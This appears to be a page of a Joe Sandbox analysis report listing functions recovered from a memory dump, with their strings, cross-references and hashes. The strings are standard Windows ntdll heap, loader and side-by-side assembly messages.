String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: d9d896e4220aa1f3996156c5f36f9bd568c48d44fe31eb770f5fcdddd9fe0daa
Instruction ID: 13ce63631c07ea1d7b9be59a860cc432ae067ff61a35a1db6789690e77e43217
Opcode Fuzzy Hash: d9d896e4220aa1f3996156c5f36f9bd568c48d44fe31eb770f5fcdddd9fe0daa
Instruction Fuzzy Hash: 9902A0F1D11229DBDB35DB59CD80BA9B7B8AF44304F0141DAEB09A7281E7709E84CF69

Function 012B8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

csrss.exe, xrefs: 012B8B80
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 012B8BD0
smss.exe, xrefs: 012B8B8B
svchost.exe, xrefs: 012B8B68
SegmentHeap, xrefs: 012B8BE9
DefaultBrowser_NOPUBLISHERID, xrefs: 012B8D00
runtimebroker.exe, xrefs: 012B8B73
services.exe, xrefs: 012B8B96
heapType, xrefs: 012B8BCB
lsass.exe, xrefs: 012B8BA1

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 567198efad1c1ce7e2017d73d729e4697154f731a556bdac54daddbb5da80166
Instruction ID: ae89f73eb4a488cf5d358424884dfed3d53b3e7c55274eb485762399aaf7afd6
Opcode Fuzzy Hash: 567198efad1c1ce7e2017d73d729e4697154f731a556bdac54daddbb5da80166
Instruction Fuzzy Hash: 8751C3B15247429BD329DF188884BEBBBECEF98790F14491EEA59C3280E770D544CBD2

Function 012C0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 012C0399, 012C04A8, 012C05D0, 012C0675, 012C06CC
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 012C04D3
About to reallocate block at %p to %Ix bytes, xrefs: 012C03BA
RtlReAllocateHeap, xrefs: 012C02BF, 012C0362
Just reallocated block at %p to %Ix bytes, xrefs: 012C05F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 012C06EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 012C069F
HEAP: , xrefs: 012C03A6, 012C04B5, 012C05DD, 012C0682, 012C06D9

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 30673258b38b1177bd96d180afd5f9270d50cdae593628173e5dd826fa1dfae4
Instruction ID: 9b5ecf2010ac58c11cfb5679d63d565afac7d0217646e7d6f8cd1a0de6c8817a
Opcode Fuzzy Hash: 30673258b38b1177bd96d180afd5f9270d50cdae593628173e5dd826fa1dfae4
Instruction Fuzzy Hash: 82D1FD39520686DFDB26DFA8C401AAAFBF2FF59B00F08821DF6459B652C7359940CB18

Function 012989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01298A3D
VerifierDlls, xrefs: 01298CBD
VerifierFlags, xrefs: 01298C50
VerifierDebug, xrefs: 01298CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01298A67
HandleTraces, xrefs: 01298C8F
AVRF: -*- final list of providers -*- , xrefs: 01298B8F

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 45e18ff4ce4fc9a6f91f8a51cbca4e6c3e2a42d23610fe2e342b388a0d979da8
Instruction ID: d23e45a9bcdc1bac6ba376b7b5d280b0b70f2a2fecf8d1e8affcf3cf90fe8a71
Opcode Fuzzy Hash: 45e18ff4ce4fc9a6f91f8a51cbca4e6c3e2a42d23610fe2e342b388a0d979da8
Instruction Fuzzy Hash: 1191347266130AAFDF22EF2CC8A1B2B77E8AF55714F080419FA40AB281D7709C40CB95

Function 0121EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 0121EB62
T, xrefs: 0121EB4E
{, xrefs: 01274643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0121EB6C
, xrefs: 0121F299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0121EB58

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 231092ba61cc0a9bfec117b66bac5271324264c756551ed2893a51670d93ac47
Instruction ID: e408fa7685eb28106a88da661f04b78fa4f65ff71fcab6585b554aa9e5a911db
Opcode Fuzzy Hash: 231092ba61cc0a9bfec117b66bac5271324264c756551ed2893a51670d93ac47
Instruction Fuzzy Hash: CCA29970A2526A8FDB25DF18CD98BAABBB5FF55300F1042E9D91DA7254DB709E84CF00

Function 012463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 012840D8
_LdrpInitialize, xrefs: 012840DF, 01284141, 01284205, 0128425F
Delaying execution failed with status 0x%08lx, xrefs: 01284258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 012841FE
minkernel\ntdll\ldrinit.c, xrefs: 012840E9, 0128414B, 0128420F, 01284269
Process initialization failed with status 0x%08lx, xrefs: 0128413A

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 3316a74a30691f05245d5ccd20a35f0506bcfb398b1670ac30b033969ad878cd
Instruction ID: f973636a9292b532a4a84740bf40d0ff9bdebe4f2d0f6e365c3de0f643027e78
Opcode Fuzzy Hash: 3316a74a30691f05245d5ccd20a35f0506bcfb398b1670ac30b033969ad878cd
Instruction Fuzzy Hash: 4E913570B21357DBEB3AEF58D855BBA7BE5EB51B24F04011EEA006B2C5D7B09841CB90

Function 0120645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01206496
minkernel\ntdll\ldrinit.c, xrefs: 01269A11, 01269A3A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012699ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01269A01
LdrpInitShimEngine, xrefs: 012699F4, 01269A07, 01269A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01269A2A

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 489a5d5bbe8700736140df795b59504641c59039aad743205ec97740de5736f2
Instruction ID: cde9ecbd7aeb3f17f189f7d3557ab466f4bc18f48aef84b82e0bff631930d44b
Opcode Fuzzy Hash: 489a5d5bbe8700736140df795b59504641c59039aad743205ec97740de5736f2
Instruction Fuzzy Hash: 6751B3712683059FDB26DF24D851B6B7BE8FB84B48F00091EF68597191DB70ED84CB92

Function 01242674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01282178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01282180
RtlGetAssemblyStorageRoot, xrefs: 01282160, 0128219A, 012821BA
SXS: %s() passed the empty activation context, xrefs: 01282165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012821BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0128219F

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: e767347ffc6ef9457a57e1de9cc95de4505c8c0c510ff6a3b33c20c351820305
Instruction ID: 7e701ebf01a0d6e542df932f4451a8e4694567d7ec4bcb60dfdd03e0fb4341a8
Opcode Fuzzy Hash: e767347ffc6ef9457a57e1de9cc95de4505c8c0c510ff6a3b33c20c351820305
Instruction Fuzzy Hash: 3E313B36F61215F7F719DA9A9C41F6A7E78DF64A90F15005DFB05B7181D3B09A00C7A0

Function 0124C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 01288177, 012881EB
LdrpInitializeProcess, xrefs: 0124C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 01288181, 012881F5
Unable to build import redirection Table, Status = 0x%x, xrefs: 012881E5
minkernel\ntdll\ldrinit.c, xrefs: 0124C6C3
Loading import redirection DLL: '%wZ', xrefs: 01288170

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: eca3e312d632f9ccae157d4343d1de53b4aeda601620ba95ffed2cfb30910f87
Instruction ID: cbbe84344d4ae59efa11822023fdabc2b840c22adcaf2eb2788df69741a99add
Opcode Fuzzy Hash: eca3e312d632f9ccae157d4343d1de53b4aeda601620ba95ffed2cfb30910f87
Instruction Fuzzy Hash: 1831E2B16653469FD328EB29D946E2AB7D9AFD4B10F00055CFA456B291EB20EC04C7A2

Function 0125096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01252DF0: LdrInitializeThunk.NTDLL ref: 01252DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01250BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01250BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01250D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01250D74

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 0b5907d624606866108f0357c8da0ed3c3cb4c01183556c7a98e6939569a911a
Instruction ID: 41d1e09d5bab71c95246dbfc99d355888be81da87a84712ee7036c89faec23ae
Opcode Fuzzy Hash: 0b5907d624606866108f0357c8da0ed3c3cb4c01183556c7a98e6939569a911a
Instruction Fuzzy Hash: F5425C71910716DFDB61CF28C881BAAB7F5FF44314F1445A9E989EB242E770A984CF60

Function 0121A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0121A3EF
LdrResFallbackLangList Exit, xrefs: 0121A3FF
6, xrefs: 0121A3F7
8, xrefs: 0121A3E7

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: b93e99dbf185665b4e17831568fcba2c5e17c824c540ea2ef452ad9c57e35705
Instruction ID: c9fa0a9c7469d84dd8faa9e61798f4e997ef8c931bdb3bd817faea5e48674cea
Opcode Fuzzy Hash: b93e99dbf185665b4e17831568fcba2c5e17c824c540ea2ef452ad9c57e35705
Instruction Fuzzy Hash: 5CC18A70529382DFD721CF58C140B6BB7E4FFA4704F04486AFA958B259E774CA49CB52

Function 01248402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01248591
LdrpInitializeProcess, xrefs: 01248422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0124855E
minkernel\ntdll\ldrinit.c, xrefs: 01248421

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: f10c80267380a330ae17cf41a27639b95038a7e631688e768667600d15c83a10
Instruction ID: 0ed261fa9a5a91e86c07d33ee0d4475112b1c08e5b1ab6bdcf99d1e12234b8a5
Opcode Fuzzy Hash: f10c80267380a330ae17cf41a27639b95038a7e631688e768667600d15c83a10
Instruction Fuzzy Hash: E7918E71568345EFD725EFA5CC81FBBBAE8FB84744F40492EFA8492191E334D9048B62

Function 0124273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012822B6
SXS: %s() passed the empty activation context, xrefs: 012821DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012821D9, 012822B1
.Local, xrefs: 012428D8

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 7881e514999992ebcd6deae92111676b913c34dc4f282fd4c8f541cc1c1f0e81
Instruction ID: 4d6226058ce1580ad5b726c1d7bc2e7cc234513bc8e1e3ca7f0dc1b777627133
Opcode Fuzzy Hash: 7881e514999992ebcd6deae92111676b913c34dc4f282fd4c8f541cc1c1f0e81
Instruction Fuzzy Hash: 91A1EB3592122ADFDB29DF59DC84BA9B7B0BF58314F2441E9EA08A7251D7709EC0CF90

Function 012164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01271028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012710AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01270FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0127106B

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 16f410114b9fd13865dd3109484ca194d1739b0fba7419fb7bdeaac60dbdcc07
Instruction ID: 709cacfde439e653fd443a49648e0ceaccfd407bfe6a11f7b1d73fc4fdf1a87f
Opcode Fuzzy Hash: 16f410114b9fd13865dd3109484ca194d1739b0fba7419fb7bdeaac60dbdcc07
Instruction Fuzzy Hash: E671D2B1924306AFCB61DF18C885BAB7FE8AF64754F000468FD498B18AD774D588CBD2

Function 0123245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0127A992
apphelp.dll, xrefs: 01232462
minkernel\ntdll\ldrinit.c, xrefs: 0127A9A2
LdrpDynamicShimModule, xrefs: 0127A998

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0c5a7fe8da9bb85c1365f207f5c94409c452dea112b335280354a4bf95fa3e41
Instruction ID: 47bf1a704400a31062869c42cd696387ef1ce964a25823c101bf4f7264ce8870
Opcode Fuzzy Hash: 0c5a7fe8da9bb85c1365f207f5c94409c452dea112b335280354a4bf95fa3e41
Instruction Fuzzy Hash: 81314AB1620202EFDB369F5D8891A7FBBFCFB84B14F1A005AEA0067249C7B09951C740

Function 012229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0122327D
HEAP[%wZ]: , xrefs: 01223255
HEAP: , xrefs: 01223264

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: a92248a309b78c2fd017afde830b506addc0df2c70e9652f314bc9457d19496f
Instruction ID: 2840e9132d2e714380a99a2e84cd735307c7b465b35f0773ab0873dd2e9c3ef8
Opcode Fuzzy Hash: a92248a309b78c2fd017afde830b506addc0df2c70e9652f314bc9457d19496f
Instruction Fuzzy Hash: BD92CE71A2426AEFDB25CF68C440BAEBBF1FF48300F148059E959AB351D779A941CF50

Function 01220770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 012750AE
(UCRBlock->Size >= *Size), xrefs: 012750CA
HEAP: , xrefs: 012750BD

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 64fbfa3c4d6721be30c7059ba4ab91049f29a89c962d1b3de10a35679d5415c6
Instruction ID: 88929c95797ece16bb6b2f6393706bcb6af28462924b6f59f1b3e0d854df2e38
Opcode Fuzzy Hash: 64fbfa3c4d6721be30c7059ba4ab91049f29a89c962d1b3de10a35679d5415c6
Instruction Fuzzy Hash: 79F1BB30B20606EFEB25CF68C894B6EB7B5FF44700F148269E6069B391D774E981CB95

Function 01236962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01236C24
, xrefs: 0127CA51

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: fa2f05b2419575df83245e1bbcb807dfcf0dab34964a7b1cebde49e60582da77
Instruction ID: 6aff80f90802c81823dd46e7b03dff3d303a750580971cb34c5656cd97b6a639
Opcode Fuzzy Hash: fa2f05b2419575df83245e1bbcb807dfcf0dab34964a7b1cebde49e60582da77
Instruction Fuzzy Hash: 17C284B16283429FDB25CF28C481BABBBE5AFC8714F04892DFA89C7241D774D945CB52

Function 0120A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0126C1E4
UseFilter, xrefs: 0120A1C1
FilterFullPath, xrefs: 0126C2E6

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 3e15f9986da2bae14fc4189ca5fe548c336b41513aa70036e64fb3573335ddb6
Instruction ID: 207a29d10a0b56064674ad197317669977a7bbb4335840ea3fa008cca7dd3e59
Opcode Fuzzy Hash: 3e15f9986da2bae14fc4189ca5fe548c336b41513aa70036e64fb3573335ddb6
Instruction Fuzzy Hash: 9FA1607192162A9BDB31EF64CC88BEAB7B8EF44710F1001E9DA08A7290D7359ED4CF50

Function 01230BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0127A10F
LdrpCheckModule, xrefs: 0127A117
minkernel\ntdll\ldrinit.c, xrefs: 0127A121

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: ac04cc5c16b63f927017cdfaa5b6dd148460998fa7ac81ddb9824765c1a644c8
Instruction ID: 5f86d2e6e4a042d9d28b47400bb1874aa8e1af31c1d1f2cd504e1b678ef0a858
Opcode Fuzzy Hash: ac04cc5c16b63f927017cdfaa5b6dd148460998fa7ac81ddb9824765c1a644c8
Instruction Fuzzy Hash: BE71C4B0A20206DFDB2ADF68C991BBEB7F8FB84704F18442DE90297255E774AD41CB54

Function 01220A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01275335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0127534D
HEAP: , xrefs: 01275342

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: af1eb890f9a13a95766b1875eac805678d1091dbab193d532ab79fe9a18bc4ea
Instruction ID: eb1c272d59eb09d98d7d5178c92df040f32872a7baad3afa46aa4d021f49d0df
Opcode Fuzzy Hash: af1eb890f9a13a95766b1875eac805678d1091dbab193d532ab79fe9a18bc4ea
Instruction Fuzzy Hash: F161D070620316EFDB29CF28C485B6ABBE1FF44704F14855AF9598F292D7B0E881CB95

Function 0124C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 012882DE
minkernel\ntdll\ldrinit.c, xrefs: 012882E8
Failed to reallocate the system dirs string !, xrefs: 012882D7

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 17c839ace4483692d0b528d2c5d58ac348be490d207dd985581824d269f89bda
Instruction ID: 4b6c6b3d4f85d4e3c35aae3247f977b1e844ae487fc2fa19f3cacbdcd071b5ce
Opcode Fuzzy Hash: 17c839ace4483692d0b528d2c5d58ac348be490d207dd985581824d269f89bda
Instruction Fuzzy Hash: 124124B1566306ABD72AEB6CDC41B6B77ECEF44750F00452AFA48D3295E770D810CB91

Function 012CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 012CC212
@, xrefs: 012CC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 012CC1C5

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 4cdd78a730930df90ef1d44cf770bd667f27a13cfff7f5d6d6605237888507f6
Instruction ID: 43a9a4aaa5ea4928793a3d5f95be5fbc0a41d1c751a0055c39f6323d56734bbc
Opcode Fuzzy Hash: 4cdd78a730930df90ef1d44cf770bd667f27a13cfff7f5d6d6605237888507f6
Instruction Fuzzy Hash: 86416671D2021AEBDF11DAD8C891FEEBBB9AB14B10F14416EE709B7240D7749A44CB51

Function 012A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 012A4160
@, xrefs: 012A4225
LdrpResValidateFilePath Exit, xrefs: 012A4172

Memory Dump Source

